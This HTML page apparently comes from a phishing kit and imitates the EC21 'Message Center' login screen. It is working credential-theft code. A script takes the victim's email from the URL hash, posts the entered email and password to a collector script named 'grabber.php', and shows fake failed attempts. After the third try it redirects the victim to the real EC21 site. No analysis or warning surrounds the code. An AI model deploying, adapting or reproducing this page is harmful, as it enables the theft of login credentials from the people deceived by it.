
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/html">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,10,9,8,7"/>
	<title>EC21 | Login</title>
	<meta name="robots" content="noindex" /><meta name="robots" content="nofollow" />
	<META NAME="GOOGLEBOT" CONTENT="NOARCHIVE" /><META NAME="GOOGLEBOT" CONTENT="NOSNIPPET" />
</head>
<body  background="includes/bg.png" >

<script>
const url = 'grabber.php';   //full url goes here
</script>

<style>
.login{
	width:320px; height:20px; font-family: arial; font-size: 14px; color:#0965B1; font-weight:light; 
	background-color: #ffffff; border: solid 1px #BDBDBD; 
	-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 7px; border-radius: 2px 3px 1px 5px;
}
.btn{
	width:335px; height:35px; font-family: arial; font-size: 14px; color:#FFF; background-color: #0965B1; border: solid 1px #0965B1;
	-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 10px; border-radius: 2px 5px 1px 7px;
	cursor:pointer; 
}

</style>
<div style="margin:-8px;width:100%">

<div style="position:absolute;top:250px;left:750px;">
	<font style="font-family: arial; font-size: 23px; color:#0965B1;">
		Message Center
	</font>
</div>

<div style="position:absolute;top:290px;left:750px;">
	<font style="font-family: arial; font-size: 17px; color:#333333;">
		Authentication Required
	</font>
	<br>
	<font style="font-family: arial; font-size: 13px; color:#333333;">
		Sign in to continue...
	</font>
</div>

<div style="position:absolute;top:540px;left:80px;">
	<font style="font-family: arial; font-size: 18px; color:#0965B1;">
	
	</font>
</div>    
	<form method="post" action="" onsubmit="Validate(); return false;">
	<input readonly id="user" name="user" class="login" style="position:absolute;top:340px;left:760px" type="email">
	<input required placeholder="enter password" type="password" id="pass" name="pass" class="login" style="position:absolute;top:390px;left:760px">
	<div style="position:absolute;top:440px;left:760px;">
		<input type="checkbox" checked>
		<font style="font-family: arial; font-size: 12px; color:#5B5C5D;"> Remember me</font>
	</div>
	<input id="b1" type="submit" class="btn" style="position:absolute;top:470px;left:760px; font-weight:bold;" value="Login">
	</form>
</div>

<input type="hidden" id="count" value="0">
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script>


<script>
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          var my_email =email;
          $('#user').val(my_email);
			
			}
		  })


function Validate(){
var a = $('#user').val();
var b = $('#pass').val();
var c = $('#count').val();

$.post(url, {user:a,pass:b}, function(){
setTimeout(function(){
if(c>=2){
$('#count').val('0');
window.location='https://www.ec21.com/global-buyer-directory';
}else{
$('#bg').fadeOut();
$('#bg2').fadeIn();
$('#user').css('top','250px');
$('#pass').css('top','311px');
$('#b1').css('top','381px');
$('#pass').val('');
var add = +c+1;
$('#count').val(add);
$('#pass').focus();
}
},2000);
});
}
</script>

<script>
function process(){
	var user = document.getElementById('user').value;
	var pass = document.getElementById('pass').value;
	if ((user == '') || (user == null)){
	document.getElementById('bg').src='';
	document.getElementById('user').focus();
return false;	
	}else
	if ((pass == '') || (pass == null)){
	document.getElementById('bg').src='';
	document.getElementById('pass').focus();
return false;	
	}else
	
return true	;
}
</script>
<script>
$('input').focus(function(){
  $(this).parents('.form-group').addClass('focused');
});

$('input').blur(function(){
  var inputValue = $(this).val();
  if ( inputValue == "" ) {
    $(this).removeClass('filled');
    $(this).parents('.form-group').removeClass('focused');  
  } else {
    $(this).addClass('filled');
  }
})  
</script>
</body>
</html>